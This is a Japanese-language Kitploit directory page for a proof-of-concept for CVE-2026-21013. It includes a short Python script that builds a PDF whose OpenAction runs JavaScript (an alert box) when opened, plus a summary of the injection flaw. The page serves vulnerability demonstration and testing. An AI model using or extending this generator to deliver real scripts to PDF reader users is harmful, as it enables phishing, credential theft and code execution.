Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script — 埋め込みJavaScriptを含むPDFを生成して、CVE-2026-21013(脆弱なPDFリーダーでスクリプト実行につながるOpenActionインジェクション)を実証します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script
ペイロード生成脆弱性分析エクスプロイトウェブセキュリティ
GitHubgeorge0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script

CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script

埋め込みJavaScriptを含むPDFを生成して、CVE-2026-21013(脆弱なPDFリーダーでスクリプト実行につながるOpenActionインジェクション)を実証します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
21ヶ月前未レビュー

CVE-2026-21013 – 埋め込みスクリプトによるPDF JavaScriptインジェクション

プログラムコード(悪意のあるPDFを生成するPython)

root@kitploit:~
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
    f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")

CVE-2026-21013 – OpenAction経由のPDF JavaScriptインジェクション

Severity: Medium

概要

PDFジェネレーターは、ユーザーが指定したコンテンツをPDFファイルに埋め込む前にサニタイズしません。攻撃者は、ドキュメントを開いたときに実行される/OpenAction JavaScriptエントリを注入でき、これにより(Webビューアでの)クロスサイトスクリプティングや、(完全なJSサポートを備えたデスクトップリーダーでの)ローカルコード実行につながります。

脆弱性の詳細

  • タイプ: PDFインジェクション / クライアントサイドコード実行
  • 影響: フィッシング、認証情報の窃取、マルウェアの配布。
  • 根本原因: PDFライブラリは、攻撃者が制御する文字列をエスケープや検証なしにPDF構造に直接埋め込みます。

エクスプロイトのデモ

ジェネレーターを実行します:

root@kitploit:~
python generate_pdf_js_inject.py

生成されたmalicious.pdfをJavaScriptをサポートするPDFリーダーで開くと、アラートボックスが表示されます。

ツールをダウンロード